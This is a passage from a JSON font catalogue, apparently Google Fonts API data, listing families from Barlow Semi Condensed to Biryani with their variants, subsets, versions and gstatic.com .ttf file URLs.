        "900italic"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v6",
      "lastModified": "2020-09-02",
      "files": {
        "100": "http://fonts.gstatic.com/s/barlowsemicondensed/v6/wlphgxjLBV1hqnzfr-F8sEYMB0Yybp0mudRfG4qvKk8ogoSP.ttf",
        "100italic": "http://fonts.gstatic.com/s/barlowsemicondensed/v6/wlpjgxjLBV1hqnzfr-F8sEYMB0Yybp0mudRXfbLLIEsKh5SPZWs.ttf",
        "200": "http://fonts.gstatic.com/s/barlowsemicondensed/v6/wlpigxjLBV1hqnzfr-F8sEYMB0Yybp0mudRft6uPAGEki52WfA.ttf",
        "200italic": "http://fonts.gstatic.com/s/barlowsemicondensed/v6/wlpkgxjLBV1hqnzfr-F8sEYMB0Yybp0mudRXfbJnAWsgqZiGfHK5.ttf",
        "300": "http://fonts.gstatic.com/s/barlowsemicondensed/v6/wlpigxjLBV1hqnzfr-F8sEYMB0Yybp0mudRf06iPAGEki52WfA.ttf",
        "300italic": "http://fonts.gstatic.com/s/barlowsemicondensed/v6/wlpkgxjLBV1hqnzfr-F8sEYMB0Yybp0mudRXfbIDAmsgqZiGfHK5.ttf",
        "regular": "http://fonts.gstatic.com/s/barlowsemicondensed/v6/wlpvgxjLBV1hqnzfr-F8sEYMB0Yybp0mudRnf4CrCEo4gg.ttf",
        "italic": "http://fonts.gstatic.com/s/barlowsemicondensed/v6/wlphgxjLBV1hqnzfr-F8sEYMB0Yybp0mudRXfYqvKk8ogoSP.ttf",
        "500": "http://fonts.gstatic.com/s/barlowsemicondensed/v6/wlpigxjLBV1hqnzfr-F8sEYMB0Yybp0mudRfi6mPAGEki52WfA.ttf",
        "500italic": "http://fonts.gstatic.com/s/barlowsemicondensed/v6/wlpkgxjLBV1hqnzfr-F8sEYMB0Yybp0mudRXfbJbA2sgqZiGfHK5.ttf",
        "600": "http://fonts.gstatic.com/s/barlowsemicondensed/v6/wlpigxjLBV1hqnzfr-F8sEYMB0Yybp0mudRfp66PAGEki52WfA.ttf",
        "600italic": "http://fonts.gstatic.com/s/barlowsemicondensed/v6/wlpkgxjLBV1hqnzfr-F8sEYMB0Yybp0mudRXfbJ3BGsgqZiGfHK5.ttf",
        "700": "http://fonts.gstatic.com/s/barlowsemicondensed/v6/wlpigxjLBV1hqnzfr-F8sEYMB0Yybp0mudRfw6-PAGEki52WfA.ttf",
        "700italic": "http://fonts.gstatic.com/s/barlowsemicondensed/v6/wlpkgxjLBV1hqnzfr-F8sEYMB0Yybp0mudRXfbITBWsgqZiGfHK5.ttf",
        "800": "http://fonts.gstatic.com/s/barlowsemicondensed/v6/wlpigxjLBV1hqnzfr-F8sEYMB0Yybp0mudRf36yPAGEki52WfA.ttf",
        "800italic": "http://fonts.gstatic.com/s/barlowsemicondensed/v6/wlpkgxjLBV1hqnzfr-F8sEYMB0Yybp0mudRXfbIPBmsgqZiGfHK5.ttf",
        "900": "http://fonts.gstatic.com/s/barlowsemicondensed/v6/wlpigxjLBV1hqnzfr-F8sEYMB0Yybp0mudRf-62PAGEki52WfA.ttf",
        "900italic": "http://fonts.gstatic.com/s/barlowsemicondensed/v6/wlpkgxjLBV1hqnzfr-F8sEYMB0Yybp0mudRXfbIrB2sgqZiGfHK5.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Barriecito",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v3",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/barriecito/v3/WWXXlj-CbBOSLY2QTuY_KdUiYwTO0MU.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Barrio",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v5",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/barrio/v5/wEO8EBXBk8hBIDiEdQYhWdsX1Q.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Basic",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v10",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/basic/v10/xfu_0WLxV2_XKQN34lDVyR7D.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Baskervville",
      "variants": [
        "regular",
        "italic"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v4",
      "lastModified": "2020-09-25",
      "files": {
        "regular": "http://fonts.gstatic.com/s/baskervville/v4/YA9Ur0yU4l_XOrogbkun3kQgt5OohvbJ9A.ttf",
        "italic": "http://fonts.gstatic.com/s/baskervville/v4/YA9Kr0yU4l_XOrogbkun3kQQtZmspPPZ9Mlt.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Battambang",
      "variants": [
        "regular",
        "700"
      ],
      "subsets": [
        "khmer"
      ],
      "version": "v14",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/battambang/v14/uk-mEGe7raEw-HjkzZabDnWj4yxx7o8.ttf",
        "700": "http://fonts.gstatic.com/s/battambang/v14/uk-lEGe7raEw-HjkzZabNsmMxyRa8oZK9I0.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Baumans",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/baumans/v10/-W_-XJj9QyTd3QfpR_oyaksqY5Q.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Bayon",
      "variants": [
        "regular"
      ],
      "subsets": [
        "khmer"
      ],
      "version": "v14",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/bayon/v14/9XUrlJNmn0LPFl-pOhYEd2NJ.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Be Vietnam",
      "variants": [
        "100",
        "100italic",
        "300",
        "300italic",
        "regular",
        "italic",
        "500",
        "500italic",
        "600",
        "600italic",
        "700",
        "700italic",
        "800",
        "800italic"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v2",
      "lastModified": "2020-07-23",
      "files": {
        "100": "http://fonts.gstatic.com/s/bevietnam/v2/FBVxdDflz-iPfoPuIC2iKsUn7W1hK2czPg.ttf",
        "100italic": "http://fonts.gstatic.com/s/bevietnam/v2/FBVvdDflz-iPfoPuIC2iIqMfiWdlCWIjPi5p.ttf",
        "300": "http://fonts.gstatic.com/s/bevietnam/v2/FBVwdDflz-iPfoPuIC2iKg0FzUdPJ24qJzc.ttf",
        "300italic": "http://fonts.gstatic.com/s/bevietnam/v2/FBVudDflz-iPfoPuIC2iIqMfQUVFI0wvNzdwXQ.ttf",
        "regular": "http://fonts.gstatic.com/s/bevietnam/v2/FBVzdDflz-iPfoPuIC2iEqEt6U9kO2c.ttf",
        "italic": "http://fonts.gstatic.com/s/bevietnam/v2/FBVxdDflz-iPfoPuIC2iIqMn7W1hK2czPg.ttf",
        "500": "http://fonts.gstatic.com/s/bevietnam/v2/FBVwdDflz-iPfoPuIC2iKlUEzUdPJ24qJzc.ttf",
        "500italic": "http://fonts.gstatic.com/s/bevietnam/v2/FBVudDflz-iPfoPuIC2iIqMfGURFI0wvNzdwXQ.ttf",
        "600": "http://fonts.gstatic.com/s/bevietnam/v2/FBVwdDflz-iPfoPuIC2iKnkDzUdPJ24qJzc.ttf",
        "600italic": "http://fonts.gstatic.com/s/bevietnam/v2/FBVudDflz-iPfoPuIC2iIqMfNUNFI0wvNzdwXQ.ttf",
        "700": "http://fonts.gstatic.com/s/bevietnam/v2/FBVwdDflz-iPfoPuIC2iKh0CzUdPJ24qJzc.ttf",
        "700italic": "http://fonts.gstatic.com/s/bevietnam/v2/FBVudDflz-iPfoPuIC2iIqMfUUJFI0wvNzdwXQ.ttf",
        "800": "http://fonts.gstatic.com/s/bevietnam/v2/FBVwdDflz-iPfoPuIC2iKgEBzUdPJ24qJzc.ttf",
        "800italic": "http://fonts.gstatic.com/s/bevietnam/v2/FBVudDflz-iPfoPuIC2iIqMfTUFFI0wvNzdwXQ.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Bebas Neue",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v2",
      "lastModified": "2020-09-10",
      "files": {
        "regular": "http://fonts.gstatic.com/s/bebasneue/v2/JTUSjIg69CK48gW7PXooxW5rygbi49c.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Belgrano",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/belgrano/v11/55xvey5tM9rwKWrJZcMFirl08KDJ.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Bellefair",
      "variants": [
        "regular"
      ],
      "subsets": [
        "hebrew",
        "latin",
        "latin-ext"
      ],
      "version": "v6",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/bellefair/v6/kJExBuYY6AAuhiXUxG19__A2pOdvDA.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Belleza",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/belleza/v9/0nkoC9_pNeMfhX4BtcbyawzruP8.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Bellota",
      "variants": [
        "300",
        "300italic",
        "regular",
        "italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "cyrillic",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v2",
      "lastModified": "2020-07-23",
      "files": {
        "300": "http://fonts.gstatic.com/s/bellota/v2/MwQzbhXl3_qEpiwAID55kGMViblPtXs.ttf",
        "300italic": "http://fonts.gstatic.com/s/bellota/v2/MwQxbhXl3_qEpiwAKJBjHGEfjZtKpXulTQ.ttf",
        "regular": "http://fonts.gstatic.com/s/bellota/v2/MwQ2bhXl3_qEpiwAGJJRtGs-lbA.ttf",
        "italic": "http://fonts.gstatic.com/s/bellota/v2/MwQ0bhXl3_qEpiwAKJBbsEk7hbBWrA.ttf",
        "700": "http://fonts.gstatic.com/s/bellota/v2/MwQzbhXl3_qEpiwAIC5-kGMViblPtXs.ttf",
        "700italic": "http://fonts.gstatic.com/s/bellota/v2/MwQxbhXl3_qEpiwAKJBjDGYfjZtKpXulTQ.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Bellota Text",
      "variants": [
        "300",
        "300italic",
        "regular",
        "italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "cyrillic",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v2",
      "lastModified": "2020-07-23",
      "files": {
        "300": "http://fonts.gstatic.com/s/bellotatext/v2/0FlMVP2VnlWS4f3-UE9hHXM5VfsqfQXwQy6yxg.ttf",
        "300italic": "http://fonts.gstatic.com/s/bellotatext/v2/0FlOVP2VnlWS4f3-UE9hHXMx--Gmfw_0YSuixmYK.ttf",
        "regular": "http://fonts.gstatic.com/s/bellotatext/v2/0FlTVP2VnlWS4f3-UE9hHXMB-dMOdS7sSg.ttf",
        "italic": "http://fonts.gstatic.com/s/bellotatext/v2/0FlNVP2VnlWS4f3-UE9hHXMx-9kKVyv8Sjer.ttf",
        "700": "http://fonts.gstatic.com/s/bellotatext/v2/0FlMVP2VnlWS4f3-UE9hHXM5RfwqfQXwQy6yxg.ttf",
        "700italic": "http://fonts.gstatic.com/s/bellotatext/v2/0FlOVP2VnlWS4f3-UE9hHXMx--G2eA_0YSuixmYK.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "BenchNine",
      "variants": [
        "300",
        "regular",
        "700"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-09-02",
      "files": {
        "300": "http://fonts.gstatic.com/s/benchnine/v9/ahcev8612zF4jxrwMosT--tRhWa8q0v8ag.ttf",
        "regular": "http://fonts.gstatic.com/s/benchnine/v9/ahcbv8612zF4jxrwMosrV8N1jU2gog.ttf",
        "700": "http://fonts.gstatic.com/s/benchnine/v9/ahcev8612zF4jxrwMosT6-xRhWa8q0v8ag.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Bentham",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/bentham/v11/VdGeAZQPEpYfmHglKWw7CJaK_y4.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Berkshire Swash",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/berkshireswash/v9/ptRRTi-cavZOGqCvnNJDl5m5XmNPrcQybX4pQA.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Beth Ellen",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v3",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/bethellen/v3/WwkbxPW2BE-3rb_JNT-qEIAiVNo5xNY.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Bevan",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v12",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/bevan/v12/4iCj6KZ0a9NXjF8aUir7tlSJ.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Big Shoulders Display",
      "variants": [
        "100",
        "300",
        "regular",
        "500",
        "600",
        "700",
        "800",
        "900"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v4",
      "lastModified": "2020-11-06",
      "files": {
        "100": "http://fonts.gstatic.com/s/bigshouldersdisplay/v4/fC1xPZJEZG-e9gHhdI4-NBbfd2ys3SjJCx1Ur9DrDJYM2lAZ.ttf",
        "300": "http://fonts.gstatic.com/s/bigshouldersdisplay/v4/fC1yPZJEZG-e9gHhdI4-NBbfd2ys3SjJCx1UZ_LLJrgA00kAdA.ttf",
        "regular": "http://fonts.gstatic.com/s/bigshouldersdisplay/v4/fC1_PZJEZG-e9gHhdI4-NBbfd2ys3SjJCx1sy9rvLpMc2g.ttf",
        "500": "http://fonts.gstatic.com/s/bigshouldersdisplay/v4/fC1yPZJEZG-e9gHhdI4-NBbfd2ys3SjJCx1UP_PLJrgA00kAdA.ttf",
        "600": "http://fonts.gstatic.com/s/bigshouldersdisplay/v4/fC1yPZJEZG-e9gHhdI4-NBbfd2ys3SjJCx1UE_TLJrgA00kAdA.ttf",
        "700": "http://fonts.gstatic.com/s/bigshouldersdisplay/v4/fC1yPZJEZG-e9gHhdI4-NBbfd2ys3SjJCx1Ud_XLJrgA00kAdA.ttf",
        "800": "http://fonts.gstatic.com/s/bigshouldersdisplay/v4/fC1yPZJEZG-e9gHhdI4-NBbfd2ys3SjJCx1Ua_bLJrgA00kAdA.ttf",
        "900": "http://fonts.gstatic.com/s/bigshouldersdisplay/v4/fC1yPZJEZG-e9gHhdI4-NBbfd2ys3SjJCx1UT_fLJrgA00kAdA.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Big Shoulders Inline Display",
      "variants": [
        "100",
        "300",
        "regular",
        "500",
        "600",
        "700",
        "800",
        "900"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v1",
      "lastModified": "2020-11-06",
      "files": {
        "100": "http://fonts.gstatic.com/s/bigshouldersinlinedisplay/v1/_LOlmyfF4eSU_SCrJc9OI24U7siGvBGcZqmqV9-ZZ85COrytjChoEoUCJg.ttf",
        "300": "http://fonts.gstatic.com/s/bigshouldersinlinedisplay/v1/_LOkmyfF4eSU_SCrJc9OI24U7siGvBGcZqmqV9-ZZ85COnSPrAJGHowbP0g.ttf",
        "regular": "http://fonts.gstatic.com/s/bigshouldersinlinedisplay/v1/_LObmyfF4eSU_SCrJc9OI24U7siGvBGcZqmqV9-ZZ85CAtiniAptAoU.ttf",
        "500": "http://fonts.gstatic.com/s/bigshouldersinlinedisplay/v1/_LOkmyfF4eSU_SCrJc9OI24U7siGvBGcZqmqV9-ZZ85COiyOrAJGHowbP0g.ttf",
        "600": "http://fonts.gstatic.com/s/bigshouldersinlinedisplay/v1/_LOkmyfF4eSU_SCrJc9OI24U7siGvBGcZqmqV9-ZZ85COgCJrAJGHowbP0g.ttf",
        "700": "http://fonts.gstatic.com/s/bigshouldersinlinedisplay/v1/_LOkmyfF4eSU_SCrJc9OI24U7siGvBGcZqmqV9-ZZ85COmSIrAJGHowbP0g.ttf",
        "800": "http://fonts.gstatic.com/s/bigshouldersinlinedisplay/v1/_LOkmyfF4eSU_SCrJc9OI24U7siGvBGcZqmqV9-ZZ85COniLrAJGHowbP0g.ttf",
        "900": "http://fonts.gstatic.com/s/bigshouldersinlinedisplay/v1/_LOkmyfF4eSU_SCrJc9OI24U7siGvBGcZqmqV9-ZZ85COlyKrAJGHowbP0g.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Big Shoulders Inline Text",
      "variants": [
        "100",
        "300",
        "regular",
        "500",
        "600",
        "700",
        "800",
        "900"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v1",
      "lastModified": "2020-11-06",
      "files": {
        "100": "http://fonts.gstatic.com/s/bigshouldersinlinetext/v1/vm8idQDmVECV5-vm5dJ-Tp-6WDeRjL4RV7dP8u-NEU7wG3AwE9VRww.ttf",
        "300": "http://fonts.gstatic.com/s/bigshouldersinlinetext/v1/vm8hdQDmVECV5-vm5dJ-Tp-6WDeRjL4RV7dP8u-NEYbSO1oeH9xI2gc.ttf",
        "regular": "http://fonts.gstatic.com/s/bigshouldersinlinetext/v1/vm8kdQDmVECV5-vm5dJ-Tp-6WDeRjL4RV7dP8u-NKSr6H1I1A9U.ttf",
        "500": "http://fonts.gstatic.com/s/bigshouldersinlinetext/v1/vm8hdQDmVECV5-vm5dJ-Tp-6WDeRjL4RV7dP8u-NEd7TO1oeH9xI2gc.ttf",
        "600": "http://fonts.gstatic.com/s/bigshouldersinlinetext/v1/vm8hdQDmVECV5-vm5dJ-Tp-6WDeRjL4RV7dP8u-NEfLUO1oeH9xI2gc.ttf",
        "700": "http://fonts.gstatic.com/s/bigshouldersinlinetext/v1/vm8hdQDmVECV5-vm5dJ-Tp-6WDeRjL4RV7dP8u-NEZbVO1oeH9xI2gc.ttf",
        "800": "http://fonts.gstatic.com/s/bigshouldersinlinetext/v1/vm8hdQDmVECV5-vm5dJ-Tp-6WDeRjL4RV7dP8u-NEYrWO1oeH9xI2gc.ttf",
        "900": "http://fonts.gstatic.com/s/bigshouldersinlinetext/v1/vm8hdQDmVECV5-vm5dJ-Tp-6WDeRjL4RV7dP8u-NEa7XO1oeH9xI2gc.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Big Shoulders Stencil Display",
      "variants": [
        "100",
        "300",
        "regular",
        "500",
        "600",
        "700",
        "800",
        "900"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v1",
      "lastModified": "2020-11-06",
      "files": {
        "100": "http://fonts.gstatic.com/s/bigshouldersstencildisplay/v1/6aeU4LS6U6pR_bp5b_t2ugOhHWFcxSGP9ttD96KCb8xPyvD00ncryljitbg.ttf",
        "300": "http://fonts.gstatic.com/s/bigshouldersstencildisplay/v1/6aeX4LS6U6pR_bp5b_t2ugOhHWFcxSGP9ttD96KCb8xPyvA88FcB5FTrrKG-.ttf",
        "regular": "http://fonts.gstatic.com/s/bigshouldersstencildisplay/v1/6aeq4LS6U6pR_bp5b_t2ugOhHWFcxSGP9ttD96KCb8xPysiQ2HMJz0ji.ttf",
        "500": "http://fonts.gstatic.com/s/bigshouldersstencildisplay/v1/6aeX4LS6U6pR_bp5b_t2ugOhHWFcxSGP9ttD96KCb8xPyvBk8VcB5FTrrKG-.ttf",
        "600": "http://fonts.gstatic.com/s/bigshouldersstencildisplay/v1/6aeX4LS6U6pR_bp5b_t2ugOhHWFcxSGP9ttD96KCb8xPyvBI9lcB5FTrrKG-.ttf",
        "700": "http://fonts.gstatic.com/s/bigshouldersstencildisplay/v1/6aeX4LS6U6pR_bp5b_t2ugOhHWFcxSGP9ttD96KCb8xPyvAs91cB5FTrrKG-.ttf",
        "800": "http://fonts.gstatic.com/s/bigshouldersstencildisplay/v1/6aeX4LS6U6pR_bp5b_t2ugOhHWFcxSGP9ttD96KCb8xPyvAw9FcB5FTrrKG-.ttf",
        "900": "http://fonts.gstatic.com/s/bigshouldersstencildisplay/v1/6aeX4LS6U6pR_bp5b_t2ugOhHWFcxSGP9ttD96KCb8xPyvAU9VcB5FTrrKG-.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Big Shoulders Stencil Text",
      "variants": [
        "100",
        "300",
        "regular",
        "500",
        "600",
        "700",
        "800",
        "900"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v1",
      "lastModified": "2020-11-06",
      "files": {
        "100": "http://fonts.gstatic.com/s/bigshouldersstenciltext/v1/5aUi9-i2oxDMNwY3dHfW7UAt3Q453SM15wNj53bCcYSZYGLxtPhi2eA.ttf",
        "300": "http://fonts.gstatic.com/s/bigshouldersstenciltext/v1/5aUj9-i2oxDMNwY3dHfW7UAt3Q453SM15wNj53bCcYRRQkLbmvRrwPmQ.ttf",
        "regular": "http://fonts.gstatic.com/s/bigshouldersstenciltext/v1/5aUg9-i2oxDMNwY3dHfW7UAt3Q453SM15wNj53bCcbz9ambTsehi.ttf",
        "500": "http://fonts.gstatic.com/s/bigshouldersstenciltext/v1/5aUj9-i2oxDMNwY3dHfW7UAt3Q453SM15wNj53bCcYQJQ0LbmvRrwPmQ.ttf",
        "600": "http://fonts.gstatic.com/s/bigshouldersstenciltext/v1/5aUj9-i2oxDMNwY3dHfW7UAt3Q453SM15wNj53bCcYQlRELbmvRrwPmQ.ttf",
        "700": "http://fonts.gstatic.com/s/bigshouldersstenciltext/v1/5aUj9-i2oxDMNwY3dHfW7UAt3Q453SM15wNj53bCcYRBRULbmvRrwPmQ.ttf",
        "800": "http://fonts.gstatic.com/s/bigshouldersstenciltext/v1/5aUj9-i2oxDMNwY3dHfW7UAt3Q453SM15wNj53bCcYRdRkLbmvRrwPmQ.ttf",
        "900": "http://fonts.gstatic.com/s/bigshouldersstenciltext/v1/5aUj9-i2oxDMNwY3dHfW7UAt3Q453SM15wNj53bCcYR5R0LbmvRrwPmQ.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Big Shoulders Text",
      "variants": [
        "100",
        "300",
        "regular",
        "500",
        "600",
        "700",
        "800",
        "900"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v4",
      "lastModified": "2020-11-06",
      "files": {
        "100": "http://fonts.gstatic.com/s/bigshoulderstext/v4/55xzezRtP9G3CGPIf49hxc8P0eytUxBU-IZ_YscCdXQB.ttf",
        "300": "http://fonts.gstatic.com/s/bigshoulderstext/v4/55xyezRtP9G3CGPIf49hxc8P0eytUxBUMKRfSOkOfG0Y3A.ttf",
        "regular": "http://fonts.gstatic.com/s/bigshoulderstext/v4/55xxezRtP9G3CGPIf49hxc8P0eytUxBsnIx7QMISdQ.ttf",
        "500": "http://fonts.gstatic.com/s/bigshoulderstext/v4/55xyezRtP9G3CGPIf49hxc8P0eytUxBUaKVfSOkOfG0Y3A.ttf",
        "600": "http://fonts.gstatic.com/s/bigshoulderstext/v4/55xyezRtP9G3CGPIf49hxc8P0eytUxBURKJfSOkOfG0Y3A.ttf",
        "700": "http://fonts.gstatic.com/s/bigshoulderstext/v4/55xyezRtP9G3CGPIf49hxc8P0eytUxBUIKNfSOkOfG0Y3A.ttf",
        "800": "http://fonts.gstatic.com/s/bigshoulderstext/v4/55xyezRtP9G3CGPIf49hxc8P0eytUxBUPKBfSOkOfG0Y3A.ttf",
        "900": "http://fonts.gstatic.com/s/bigshoulderstext/v4/55xyezRtP9G3CGPIf49hxc8P0eytUxBUGKFfSOkOfG0Y3A.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Bigelow Rules",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/bigelowrules/v9/RrQWboly8iR_I3KWSzeRuN0zT4cCH8WAJVk.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Bigshot One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/bigshotone/v11/u-470qukhRkkO6BD_7cM_gxuUQJBXv_-.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Bilbo",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/bilbo/v10/o-0EIpgpwWwZ210hpIRz4wxE.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Bilbo Swash Caps",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v13",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/bilboswashcaps/v13/zrf-0GXbz-H3Wb4XBsGrTgq2PVmdqAPopiRfKp8.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "BioRhyme",
      "variants": [
        "200",
        "300",
        "regular",
        "700",
        "800"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v5",
      "lastModified": "2020-07-23",
      "files": {
        "200": "http://fonts.gstatic.com/s/biorhyme/v5/1cX3aULHBpDMsHYW_ESOjnGAq8Sk1PoH.ttf",
        "300": "http://fonts.gstatic.com/s/biorhyme/v5/1cX3aULHBpDMsHYW_ETqjXGAq8Sk1PoH.ttf",
        "regular": "http://fonts.gstatic.com/s/biorhyme/v5/1cXwaULHBpDMsHYW_HxGpVWIgNit.ttf",
        "700": "http://fonts.gstatic.com/s/biorhyme/v5/1cX3aULHBpDMsHYW_ET6inGAq8Sk1PoH.ttf",
        "800": "http://fonts.gstatic.com/s/biorhyme/v5/1cX3aULHBpDMsHYW_ETmiXGAq8Sk1PoH.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "BioRhyme Expanded",
      "variants": [
        "200",
        "300",
        "regular",
        "700",
        "800"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v6",
      "lastModified": "2020-07-23",
      "files": {
        "200": "http://fonts.gstatic.com/s/biorhymeexpanded/v6/i7dVIE1zZzytGswgU577CDY9LjbffxxcblSHSdTXrb_z.ttf",
        "300": "http://fonts.gstatic.com/s/biorhymeexpanded/v6/i7dVIE1zZzytGswgU577CDY9Ljbffxw4bVSHSdTXrb_z.ttf",
        "regular": "http://fonts.gstatic.com/s/biorhymeexpanded/v6/i7dQIE1zZzytGswgU577CDY9LjbffySURXCPYsje.ttf",
        "700": "http://fonts.gstatic.com/s/biorhymeexpanded/v6/i7dVIE1zZzytGswgU577CDY9LjbffxwoalSHSdTXrb_z.ttf",
        "800": "http://fonts.gstatic.com/s/biorhymeexpanded/v6/i7dVIE1zZzytGswgU577CDY9Ljbffxw0aVSHSdTXrb_z.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Biryani",
      "variants": [
        "200",
        "300",
        "regular",
        "600",
        "700",
        "800",
        "900"
      ],
      "subsets": [
        "devanagari",
        "latin",
        "latin-ext"
      ],
      "version": "v6",
      "lastModified": "2020-09-02",
      "files": {
        "200": "http://fonts.gstatic.com/s/biryani/v6/hv-TlzNxIFoO84YddYQyGTBSU-J-RxQ.ttf",
        "300": "http://fonts.gstatic.com/s/biryani/v6/hv-TlzNxIFoO84YddeAxGTBSU-J-RxQ.ttf",
        "regular": "http://fonts.gstatic.com/s/biryani/v6/hv-WlzNxIFoO84YdTUwZPTh5T-s.ttf",
        "600": "http://fonts.gstatic.com/s/biryani/v6/hv-TlzNxIFoO84YddZQ3GTBSU-J-RxQ.ttf",
        "700": "http://fonts.gstatic.com/s/biryani/v6/hv-TlzNxIFoO84YddfA2GTBSU-J-RxQ.ttf",
        "800": "http://fonts.gstatic.com/s/biryani/v6/hv-TlzNxIFoO84Yddew1GTBSU-J-RxQ.ttf",
